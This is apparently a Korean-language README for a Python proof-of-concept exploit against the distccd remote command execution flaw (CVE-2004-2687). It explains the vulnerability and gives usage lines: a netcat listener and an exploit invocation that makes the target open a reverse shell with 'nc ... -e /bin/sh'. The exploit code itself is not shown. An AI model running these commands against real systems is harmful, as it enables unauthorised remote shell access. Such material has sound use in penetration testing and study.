
distccd CVE-2004-2687 원격 코드 실행 취약점을 위한 Python 기반 개념 증명 익스플로잇으로, 취약한 서버에서 인증되지 않은 셸 액세스를 가능하게 합니다.
🖥️ -h3x0v3rl0rd- #️⃣ CVE-2004-2687 #️⃣ Python3로 업그레이드
개요
이 저장소는 CVE-2004-2687로 식별된 distccd 취약점에 대한 Proof of Concept (PoC) 익스플로잇을 포함합니다. 이 취약점은 분산 C/C++ 컴파일 시스템인 distcc의 일부인 distccd 데몬에 존재합니다. 부적절하게 구성된 경우, distccd는 인증 없이 원격 공격자가 서버에서 임의의 명령을 실행할 수 있게 합니다.
취약점 세부 사항
distcc는 빌드 프로세스를 가속화하기 위해 여러 머신에 컴파일 작업을 분산하도록 설계되었습니다. 그러나 distccd 데몬이 적절히 보호되지 않으면 원격 코드 실행(RCE) 취약점이 노출됩니다. 이는 데몬이 네트워크 포트에서 수신 대기하고 모든 클라이언트의 명령을 수락하여, 데몬을 실행하는 사용자로서 서버에서 셸 명령을 실행할 수 있게 하기 때문에 발생합니다.
이 취약점은 CVE-2004-2687로 지정되었으며, distccd 버전 3.1 이전에 영향을 미칩니다. 악용될 경우, 공격자는 취약한 머신에 대한 셸 액세스 권한을 얻을 수 있으며, 이로 인해 전체 시스템이 잠재적으로 손상될 수 있습니다.
nc -lvp 4444
python3 distccd_rce.py -t [rhost] -p 3632 -c "nc [localhost] [lport] -e /bin/sh"
취약점 :

익스플로잇 :
